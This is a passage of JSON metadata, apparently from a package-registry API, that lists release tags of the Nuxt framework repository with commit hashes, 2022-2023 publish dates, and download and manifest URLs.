00Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","h